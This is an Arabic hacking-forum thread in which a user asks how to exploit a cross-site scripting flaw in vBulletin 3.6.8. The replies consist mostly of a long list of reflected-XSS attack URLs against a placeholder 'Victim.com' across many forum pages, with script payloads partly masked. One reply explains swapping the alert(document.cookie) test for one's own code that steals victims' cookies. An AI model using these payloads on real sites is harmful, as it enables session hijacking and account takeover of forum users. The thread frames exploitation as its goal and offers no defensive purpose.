|
شباب ابغ شرح كيفية استغلال هذي الثغره السلام عليكم ورحمة الله وبركاته انا صح جبت الاستغلال حق الثغره بس ما عرفت كيف استغلها وهذا رابط الثغره http://www.securityfocus.com/archive/1/476924 انتظر جواب تحياتي |
التغره ذي عندها احتمالات #Exploit : http://www.Victim.com/vBulletin V3.6.8ulletin V3.6.8/faq.php?s=&do=search&q=%22%3E%3C%2Fscript%3E%3Cscr ipt%3E*****%28d ocument.******%29%3B%3C%2Fscript&match=all&titleso nly=0 http://www.Victim.com/vBulletin V3.6.8ulletin V3.6.8/member.php?u=1=s'&do=search&q=%22%3E%3C%2Fscript%3 E%3Cscript%3Eal ert%28********.******%29%3B%3C%2Fscript&match=all& titlesonly=1 http://www.Victim.com/vBulletin V3.6.8/index.php?s=***************('********.******')</script> http://www.Victim.com/vBulletin V3.6.8/faq.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Csc ript%3E*****%28 ********.******%29%3B%3C%2Fscript&match=all&titles only=0 http://www.Victim.com/vBulletin V3.6.8/memberlist.php?s="&do=search&q=%22%3E%3C%2Fscript% 3E%3Cscript%3Ea lert%28********.******%29%3B%3C%2Fscript&match=all &titlesonly=0 http://www.Victim.com/vBulletin V3.6.8/calendar.php?s="&do=search&q=%22%3E%3C%2Fscript%3E %3Cscript%3Eale rt%28********.******%29%3B%3C%2Fscript&match=all&t itlesonly=0 http://www.Victim.com/vBulletin V3.6.8/search.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3 Cscript%3E***** %28********.******%29%3B%3C%2Fscript&match=all&tit lesonly=0 http://www.Victim.com/vBulletin V3.6.8/search.php?do=getdaily"&do=search&q=%22%3E%3C%2Fsc ript%3E%3Cscrip t%3E*****%28********.******%29%3B%3C%2Fscript&matc h=all&titlesonly=0 http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscrip t%3E%3Cscript%3 E*****%28********.******%29%3B%3C%2Fscript&match=a ll&titlesonly=0 http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?do=markread"&do=search&q=%22%3E%3 C%2Fscript%3E%3 Cscript%3E*****%28********.******%29%3B%3C%2Fscrip t&match=all&titlesonly =0 http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscrip t%3E%3Cscript%3 E*****%28********.******%29%3B%3C%2Fscript&match=a ll&titlesonly=0 http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?f=1"&do=search&q=%22%3E%3C%2Fscri pt%3E%3Cscript% 3E*****%28********.******%29%3B%3C%2Fscript&match= all&titlesonly=0 http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscrip t%3E%3Cscript%3 E*****%28********.******%29%3B%3C%2Fscript&match=a ll&titlesonly=0 http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?f=2"&do=search&q=%22%3E%3C%2Fscri pt%3E%3Cscript% 3E*****%28********.******%29%3B%3C%2Fscript&match= all&titlesonly=0 http://www.Victim.com/vBulletin V3.6.8/showgroups.php?s="&do=search&q=%22%3E%3C%2Fscript% 3E%3Cscript%3Ea lert%28********.******%29%3B%3C%2Fscript&match=all &titlesonly=0 http://www.Victim.com/vBulletin V3.6.8/online.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3 Cscript%3E***** %28********.******%29%3B%3C%2Fscript&match=all&tit lesonly=0 http://www.Victim.com/vBulletin V3.6.8/member.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3 Cscript%3E***** %28********.******%29%3B%3C%2Fscript&match=all&tit lesonly=0 http://www.Victim.com/vBulletin V3.6.8/sendmessage.php?s="&do=search&q=%22%3E%3C%2Fscript %3E%3Cscript%3E *****%28********.******%29%3B%3C%2Fscript&match=al l&titlesonly=0 |
رح نجرب هذا الاستغلال http://www.Victim.com/vBulletin V3.6.8/index.php?s=< s c r i p t >a l e r t( ' d o c u m e n t . c o o k i e ' ) < / s c r i p t> هذا استغلال تغره XSS هذي التغره تقوم بسرقة كوكيز الضحيه بس شو رح تعمل ؟ رح تغير : http://www.Victim.com/ موقع الضحيه vBulletin V3.6.8 ملف المنتدى وعادتا يكووون هكذا /vb < s c r i p t >a l e r t( ' d o c u m e n t . c o o k i e ' ) < / s c r i p t رح تحط هنا كودك البرمجي يلي يقوم بسرقة الكوكيز بس انصحك بمراجعة دورة اكتشاف التغرات |
| الساعة الآن 03:24 AM |
[ vBspiders.Com Network ]